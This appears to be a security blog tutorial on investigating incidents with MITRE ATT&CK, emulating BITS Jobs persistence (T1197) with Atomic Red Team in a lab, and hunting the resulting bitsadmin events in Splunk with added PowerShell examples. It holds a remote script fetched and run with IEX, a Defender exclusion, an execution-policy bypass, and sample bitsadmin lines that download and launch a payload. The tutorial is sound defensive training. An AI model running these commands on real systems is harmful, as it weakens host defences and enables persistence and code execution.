Demonstrating the MITRE ATT&CK framework with Atomic Red Team
Hey guys, coming back to the learning journey. I have already written multiple blogs on blue teaming, but today we are looking at things in an offensive manner.
Today I will show how we can use the MITRE ATT&CK framework for incident analysis. We will also use the Atomic Red Team tool to reproduce an attack scenario, so that we understand the offensive side and see how the attacker played their game. We will also use the Lockheed Martin Cyber Kill Chain.
During the investigation of an incident it is important to understand the attacker's intention by thinking with an attacker's mindset. Without wasting time, let's move to the topic.
🍁How to identify evil?
Baseline your environment:
- Look at the behaviour of the system and learn what normal looks like. Normal is different in every environment. A baseline lets you compare a known-good state against a suspected-bad state.
Use the Lockheed Martin Cyber Kill Chain:
- It is a good way to work out the attacker's current stage and their likely next stage. The kill chain has seven phases: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, and Actions on Objectives. I explained this kill chain in my last blog, so you can read about it there.
🍁What defence mechanisms can we use?
- Add security layer by layer (defence in depth). Example: MFA (multi-factor authentication), such as asking for an OTP at login.
- Delay the attacker as much as we can from reaching their objective. MFA is one such delay.
- Map the attacker using the MITRE ATT&CK framework. It helps analysts understand the tactics, techniques and procedures (TTPs) in use.
🍁How can we use the MITRE ATT&CK framework?
I have already explained it in detail in my last blog, but here is an overview. How you use it depends on what you are trying to look for or understand:
- Is it a specific event?
- A particular adversary?
- Something completely different?
- Mapping out what is possible for an attacker in terms of TTPs. This helps us understand what phase the attacker may be in, or in which phase you begin your investigation.
- Learning more about adversaries, e.g. what APTXYZ targets or which tools it uses.
🍁How do I stop an attacker on such a low budget?
- No matter how costly or cheap your security controls are, if you prevent the attacker from getting to their Actions on Objectives, you win.
- Our main focus is to stop them reaching their goals; then we can eradicate (remove) all malicious artefacts.
- We can use open-source tools. Yes, they are still really useful.
- Use the MITRE ATT&CK framework to map the stages of the incident.
- Use Atomic Red Team to recreate a similar offensive scenario, study the attacker's moves and anticipate the next one.
🍁What is the Atomic Red Team tool?
It is a library of small, scripted tests ("atomics") that reproduce attacker behaviour, organised by the MITRE ATT&CK framework. Every atomic test is written for a specific ATT&CK technique, and the test files are named after the technique ID they map to (for example, the BITS Jobs tests live under T1197). I have already explained this in detail here.
🍁Taking a real scenario:
You are working for XYZ Pvt. Ltd. and your team has found a suspicious new scheduled task that executes every 15 minutes. As an L1 security analyst, the investigation is assigned to you. Demonstrate your steps and explain how you will handle the whole incident.
Yes, I prepared it myself, but it is similar to something I read on https://thehackernews.com/; I just changed the name of the target and some words.
🍁Steps to handle the scenario:
Step 1: Go to MITRE ATT&CK and look up Scheduled Task/Job (T1053). It appears under the following tactics: Execution, Persistence, Privilege Escalation.
Step 2: What will be the attacker's next move/tactic? Reading across the matrix from Privilege Escalation, the next tactic is Defense Evasion.
Step 3: The analyst's next move is therefore to check whether any antivirus, EDR or firewall has been disabled (Impair Defenses, T1562).
Tip for security analysts: while identifying such events, putting yourself in a known-compromised environment helps you understand what suspicious or anomalous activity looks like. There are two ways to do this:
1. Pre-built labs hosted on platforms like CyberDefenders or LetsDefend.
2. Tools like Atomic Red Team.
Here I will go with the Atomic Red Team tool. There are some things to prepare before reproducing the attack scenario.
Note: use a Windows lab machine (never a production host) with Splunk and Sysmon installed. We are running scripts, so we have to relax the PowerShell execution policy for the current user:
Set-ExecutionPolicy Bypass -Scope CurrentUser
We already studied this tool in the last blog. Don't worry, I will give the required commands wherever they are necessary.
- Installation of Atomic Red Team (the Install-AtomicRedTeam function comes from the project's install-atomicredteam.ps1 script, which has to be loaded into the session first):
Install-AtomicRedTeam -getAtomics
- Windows Defender will quarantine some of the downloaded atomics, so add an exclusion for the install folder (C:\AtomicRedTeam by default): open Windows Security, go to Virus & threat protection, add an exclusion, and select that folder in the GUI. Do this only on the isolated lab machine.
- Now re-run the cmdlet with -Force so the partial download is overwritten:
Install-AtomicRedTeam -getAtomics -Force
- List every technique that has atomics, with its name and number of tests:
Invoke-AtomicTest All -ShowDetailsBrief
- We are interested in the Persistence tactic, specifically BITS Jobs. Click on it in the matrix and note the ID: T1197.
- To see which atomic tests ART provides for that technique:
Invoke-AtomicTest T1197 -ShowDetailsBrief
- It lists 4 tests. We can reproduce the technique with any of them; here we run all of them.
Invoke-AtomicTest T1197
Note: after closing PowerShell, the next time we try to run the tool we get an error.
Error solution: the module is only loaded for the session that installed it, so we have to re-import it.
Import-Module "C:\AtomicRedTeam\locationOfFile\Invoke-AtomicRedTeam.psd1" -Force
Invoke-AtomicTest T1197
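The steps above, put together as one lab run. This is an added example, not code from the original post or from the Atomic Red Team project: it assumes the project's default install path (C:\AtomicRedTeam) and an isolated Windows VM where Sysmon is already forwarding to Splunk. The start/end timestamps are captured so the Splunk search can be bounded to the test window, and the tests are cleaned up afterwards so the lab is not left with live BITS jobs.

```powershell
# Added example (not part of the original post). Lab VM only.
# Assumes the default install location C:\AtomicRedTeam.

# 1. Allow scripts for this user only.
Set-ExecutionPolicy Bypass -Scope CurrentUser -Force

# 2. Exclude the install folder from Defender *before* downloading the atomics,
#    otherwise some test files are quarantined and the install is incomplete.
Add-MpPreference -ExclusionPath 'C:\AtomicRedTeam'

# 3. Load the project's installer script, then fetch the atomics.
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -getAtomics -Force

# 4. Every new PowerShell session needs the module re-imported.
Import-Module 'C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1' -Force

# 5. Read what the T1197 (BITS Jobs) tests will do before running anything.
Invoke-AtomicTest T1197 -ShowDetailsBrief

# 6. Make sure prerequisites are present (fetch them if not).
Invoke-AtomicTest T1197 -CheckPrereqs
Invoke-AtomicTest T1197 -GetPrereqs

# 7. Run all tests, bracketing them with timestamps for the Splunk search.
$start = Get-Date
Invoke-AtomicTest T1197 -ExecutionLogPath 'C:\AtomicRedTeam\T1197-execution.csv'
$end = Get-Date
"Search Splunk between $($start.ToString('o')) and $($end.ToString('o'))"

# 8. Undo what the tests did (removes the BITS jobs and downloaded files).
Invoke-AtomicTest T1197 -Cleanup

# 9. Verify nothing is left behind: this should return no jobs.
Get-BitsTransfer -AllUsers | Select-Object DisplayName, JobState
```

The execution log written in step 7 records which test ran when, which is handy for matching each Sysmon event back to the atomic that produced it.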
- OK, the tests have completed. Now we analyse all the generated events in Splunk.
🕸 Analysis of the incident in Splunk:
- Since we are not exactly sure what we are looking at, we start with a broad keyword search:
index=endpoint bits
- Our next step is to clean up the query:
index=endpoint bits
| table _time, ParentImage, ParentCommandLine, Image, CommandLine
| sort +_time
Query explanation: we build a table with only the columns we care about. Seeing the parent process and its command line next to the child process makes the parent/child relationship obvious, which helps to quickly spot suspicious activity. Finally we sort by time, oldest first. Note that Splunk field names are case-sensitive, so the Sysmon fields must be spelled exactly ParentCommandLine and CommandLine, or the columns come back empty.
- Before going down the list of BITS activity, we look at MITRE ATT&CK again, this time at the Detection section of T1197. It tells us to watch for bitsadmin.exe command lines containing verbs such as Transfer, Create, AddFile and SetNotifyFlags.
- In our logs we found command lines with /transfer and /create.
- Does seeing these in your environment mean something bad? Definitely not, as I already mentioned under Baseline your environment.
- That is the reason to baseline the environment before starting the process: you need to know what your environment normally looks like.
- I think this is definitely a good threat-hunting technique.
- Just make sure you weed out (separate out) all the legitimate activity; what remains is where you may find the evil.
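The same triage as the Splunk query, as an added PowerShell example (not from the original post): it filters process-creation events for bitsadmin.exe, flags the T1197 detection verbs, and applies a small baseline allowlist so that legitimate activity is weeded out before an analyst looks at the rest. The events are constructed to mirror the Sysmon Event ID 1 fields as Splunk indexes them, and the single baseline entry (the Windows Update service spawning bitsadmin) is a hypothetical assumption about this lab, not something the post states.

```powershell
# Added example (not part of the original post).
# $Events are constructed sample records; $Baseline is a hypothetical allowlist.

# Command-line verbs the ATT&CK T1197 detection notes tell us to look for.
$BitsVerbs = '/transfer', '/create', '/addfile', '/setnotifyflags', '/setnotifycmdline', '/resume'

# Constructed sample events with the same field names as the Sysmon data in Splunk.
$Events = @(
    [pscustomobject]@{ _time = '2023-01-01T10:00:01'; ParentImage = 'C:\Windows\System32\svchost.exe'
        ParentCommandLine = 'svchost.exe -k netsvcs -p -s wuauserv'; Image = 'C:\Windows\System32\bitsadmin.exe'
        CommandLine = 'bitsadmin /transfer wu /download /priority normal http://wsus.corp.example/update.cab C:\Windows\Temp\update.cab' },
    [pscustomobject]@{ _time = '2023-01-01T10:05:12'; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentCommandLine = 'powershell.exe -ExecutionPolicy Bypass'; Image = 'C:\Windows\System32\bitsadmin.exe'
        CommandLine = 'bitsadmin /create AtomicBITS' },
    [pscustomobject]@{ _time = '2023-01-01T10:05:13'; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentCommandLine = 'powershell.exe -ExecutionPolicy Bypass'; Image = 'C:\Windows\System32\bitsadmin.exe'
        CommandLine = 'bitsadmin /addfile AtomicBITS https://example.invalid/payload.exe C:\Users\Public\payload.exe' },
    [pscustomobject]@{ _time = '2023-01-01T10:05:14'; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentCommandLine = 'powershell.exe -ExecutionPolicy Bypass'; Image = 'C:\Windows\System32\bitsadmin.exe'
        CommandLine = 'bitsadmin /SetNotifyCmdLine AtomicBITS C:\Users\Public\payload.exe NULL' },
    [pscustomobject]@{ _time = '2023-01-01T10:06:00'; ParentImage = 'C:\Windows\explorer.exe'
        ParentCommandLine = 'explorer.exe'; Image = 'C:\Windows\System32\notepad.exe'
        CommandLine = 'notepad.exe notes.txt' }
)

# Baseline allowlist (hypothetical): parent command lines that legitimately spawn bitsadmin here.
$Baseline = @(
    @{ ParentPattern = 'svchost\.exe.*wuauserv'; Reason = 'Windows Update service' }
)

function Find-SuspiciousBits {
    param([object[]]$Events, [string[]]$Verbs = $BitsVerbs, [object[]]$Allow = $Baseline)
    $results = foreach ($e in $Events) {
        if ($e.Image -notmatch 'bitsadmin\.exe$') { continue }
        # Which detection verbs appear in this command line (case-insensitive match)?
        $hits = @($Verbs | Where-Object { $e.CommandLine -match [regex]::Escape($_) })
        if ($hits.Count -eq 0) { continue }
        # Does the parent match something we have baselined as normal?
        $known = @($Allow | Where-Object { $e.ParentCommandLine -match $_.ParentPattern })
        $verdict = if ($known.Count -gt 0) { "baseline: $($known[0].Reason)" } else { 'REVIEW' }
        [pscustomobject]@{
            Time        = $e._time
            Parent      = Split-Path $e.ParentImage -Leaf
            Child       = Split-Path $e.Image -Leaf
            Verbs       = ($hits -join ',')
            Verdict     = $verdict
            CommandLine = $e.CommandLine
        }
    }
    $results | Sort-Object Time
}

# On the constructed data: the Windows Update transfer is labelled baseline,
# the three PowerShell-spawned bitsadmin calls are labelled REVIEW, notepad is ignored.
Find-SuspiciousBits -Events $Events | Format-Table -AutoSize
```

Because the field names match the Splunk table, a CSV export of that search can be fed straight in with Import-Csv; alternatively, build $Events from Get-WinEvent against the Microsoft-Windows-Sysmon/Operational log (Event ID 1) and map the event data fields to the same names. The allowlist is where your baseline lives: every entry should be something you have verified is normal in your environment, not a guess.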
✅Conclusion:
Why did I follow this framework, this tool and the cyber kill chain while investigating threats? Because putting yourself in such an environment and practising makes you quickly identify evil.
That's all for today. If you like my content give me a clap 👏, follow me 👇 and suggest the next topic for a blog. I will research it and bring you precise and accurate content, and try to explain it in simple words.